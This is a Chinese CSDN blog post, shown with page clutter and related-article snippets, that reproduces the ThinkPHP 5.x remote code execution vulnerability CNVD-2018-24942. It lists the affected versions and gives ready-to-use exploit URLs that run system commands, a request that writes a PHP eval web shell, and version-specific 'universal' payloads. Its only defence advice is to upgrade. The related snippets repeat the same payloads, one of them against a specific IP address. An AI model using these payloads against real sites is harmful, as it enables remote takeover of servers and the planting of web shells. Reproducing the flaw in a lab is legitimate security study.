thinkphp-cnvd 2018 24942

最新推荐文章于 2024-04-03 00:34:01 发布

Z_l123

最新推荐文章于 2024-04-03 00:34:01 发布

阅读量759

点赞数

文章标签：安全

本文链接：https://blog.csdn.net/Z_l123/article/details/123210524

版权

ThinkPHP 漏洞远程代码执行防御升级

关键词由CSDN通过智能技术生成

影响范围

ThinkPHP 5.0.全版本

5.0.13~5.0.19的，这些版本默认情况下config中的app_debug配置项为false，需开启才能存在此漏洞。

漏洞复现

1.访问地址

2.远程代码执行

?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=pwd

3.上传一句话木马

?s=index/\think\template\driver\file/write&cacheFile=shell.php&content=%3C?php%20@eval($_POST[cmd])?%3E

4. 通过蚁剑连接

5.查看文件

通杀payload

版本号：5.0.8~5.0.19
payload:s=whoami&_method=__construct&filter&filter=system

版本号：5.0.20~5.0.23
payload：_method=__construct&filter[]=system&method=get&server[REQUSET_METHOD]=whoami

漏洞防御

升级版本！！！

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

Z_l123

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

ThinkPHP Lang文件包含To远程代码执行漏洞复现—CNVD-2022-86535

afei001

12-14

1258

ThinkPHP是为了简化企业级应用开发和敏捷WEB应用开发而诞生的开源轻量级PHP框架。ThinkPHP存在命令执行漏洞，该漏洞是由于开启了多语言功能，对参数lang传参过滤不严谨，攻击者可利用该漏洞执行命令。本质是ThinkPHP在开启多语言功能的情况下存在文件包含漏洞，攻击者可以通过get、header、cookie等位置传入参数，ThinkPHP LoadLangPack中存在目录穿越漏洞，然后再利用pearcmd文件包含并结合它的指令config-create创建恶意代码，从而实现远程代码执行。

ThinkPHP5x 远程代码执行漏洞(CNVD-2018-24942)复现

yzl_007的博客

08-04

1271

ThinkPHP5x 远程代码执行漏洞(CNVD-2018-24942)复现影响范围 ThinkPHP 5.0.全版本 5.0.13~5.0.19的，这些版本默认情况下config中的app_debug配置项为false，需开启才能存在此漏洞。漏洞复现远程代码执行直接get请求即可 ?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=pwd pw

参与评论您还未登录，请先登录后发表或查看评论

thinkphp 代码执行 (CNVD-2018-24942)

weixin_48900801的博客

07-29

363

thinkphp 代码执行 (CNVD-2018-24942) 漏洞介绍 ThinkPHP5 存在远程代码执行漏洞。该漏洞由于框架对控制器名未能进行足够的检测，攻击者利用该漏洞对目标网站进行远程命令执行攻击。影响版本： ThinkPHP 5.*，<5.1.31 ThinkPHP <=5.0.23 过程 1.开启靶场环境 2、在其地址增加路径与参数即可,最后是需要执行的命令 ls /tmp /index.php/?s=index/\think\app/invokefunction&fu

vulfocus——thinkphp代码执行(CNVD-2018-24942)

m0_62063669的博客

09-07

659

ThinkPHP5 存在远程代码执行漏洞。该漏洞由于框架对控制器名未能进行足够的检测，攻击者利用该漏洞对目标网站进行远程命令执行攻击。4.访问一下http://ip/shell.php,然后用蚁剑连接，在/tmp下找到flag。2.构造payload远程代码执行，在/tmp下获得flag。3.我们还可以通过写入一句话木马的方式获得flag。

ThinkPHP5远程代码执行（CNVD-2018-24942）

最新发布

ANOrange的博客

04-03

605

ThinkPHP5 存在远程代码执行漏洞。该漏洞由于框架对控制器名未能进行足够的检测，攻击者利用该漏洞对目标网站进行远程命令执行攻击。本文包含POC和ThinkPHP漏洞利用工具

vulfocus thinkphp 代码执行 (CNVD-2018-24942)

03-29

漏洞描述： ...ThinkPHP 5.0.x - 5.0.18 版本 ThinkPHP 5.1.x - 5.1.0-beta.5 版本漏洞利用：攻击者可以通过在URL中添加参数，或者在POST请求中添加参数，来触发该漏洞。下面是一个简单的例子： ...

【漏洞复现】CNVD-2022-86535-ThinkphpV6多语言

rm -rf *

01-18

2497

Thinkphp多语言模块漏洞远程命令执行

ThinkPHP RCE漏洞分析合集

hackzkaq的博客

03-18

4315

ShowDoc后台文件上传漏洞分析 CNVD-2020-49480(CVE-2021-41745)

afei001

08-06

698

github获取ShowDoc源码，版本：ShowDoc v2.8.2，使用phpstudy本地搭建环境。环境搭建参考官网：ShowDoc

CMSeasy v5.5任意权限getshell

08-28

CMSeasy任意权限getshell

CNVD-2018-24942漏洞复现

尼德霍格007

07-15

992

CNVD-2018-24942漏洞复现目标：得到root权限&找到flag.txt 作者：尼德霍格007 时间：2021-7-11 开始打开靶场 http://45.159.48.193:42798/ 一个简单的getshell方法远程代码执行 http://45.159.48.193:42798/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1

[Vulfocus解题系列]ThinkPHP5 远程代码执行漏洞（CNVD-2018-24942）

00勇士王子的博客

07-04

1144

漏洞介绍 ThinkPHP5 存在远程代码执行漏洞。该漏洞由于框架对控制器名未能进行足够的检测，攻击者利用该漏洞对目标网站进行远程命令执行攻击。影响版本 ThinkPHP 5.*，<5.1.31 ThinkPHP <=5.0.23 解题过程 1.开启靶场环境 2.在其地址增加路径与参数即可,最后是需要执行的命令 ls /tmp /index.php/?s=index/\think\app/invokefunction&function=call_user_func_array&am

thinkphp命令执行漏洞(CVE-2018-1002015)

m0_65150886的博客

12-28

786

ThinkPHP 5.0.x版本和5.1.x版本中存在远程代码执行漏洞，该漏洞源于ThinkPHP在获取控制器名时未对用户提交的参数进行严格的过滤。远程攻击者可通过输入‘＼’字符的方式调用任意方法利用该漏洞执行代码。2.抓包，修改get请求。1.访问ip：port。

ThinkPhp 代码执行 (CNVD-2018-24942)漏洞复现

beichenyyds的博客

03-03

5157

漏洞介绍 ThinkPHP5 存在远程代码执行漏洞。该漏洞由于框架对控制器名未能进行足够的检测，攻击者利用该漏洞对目标网站进行远程命令执行攻击。影响版本： ThinkPHP 5.*，<5.1.31 ThinkPHP <=5.0.23 过程 1.开启靶场环境 2、在其地址增加路径与参数即可,最后是需要执行的命令 ls /tmp http://vulfocus.fofa.so:43095/index.php/?s=index/\think\app/invokefunctio

CMS系列远程代码执行—Discuz

WEB渗透测试从入门到萌新

10-06

1233

测试漏洞,随便点击一个页面,抓包,将Cookie中的xxx_language参数值改为’.phpinfo().’,发现成功执行了代码存在命令执行漏洞。

网络安全工程师的学习路线

xnxqwzy的博客

11-06

Web安全工程师一．了解黑客是如何工作的1.在虚拟机配置Linux系统2.漏洞测试工具3.msf控制台4.远程工具RATS5.远程访问计算机6.白帽二．技术基础漏斗扫描工具AWVSAWVS简介安装站点扫描扫码结果分析网络安全审计工具：Nmap安装和使用扫描多个目标扫描并排除特殊目标扫描技术端口扫描选项系统检测时间选项part1防火墙输出文件排错选项Namp的脚本引擎Zenmap的内部结构解读zenmap的输出信息NDiff和技巧Web安全基础入门。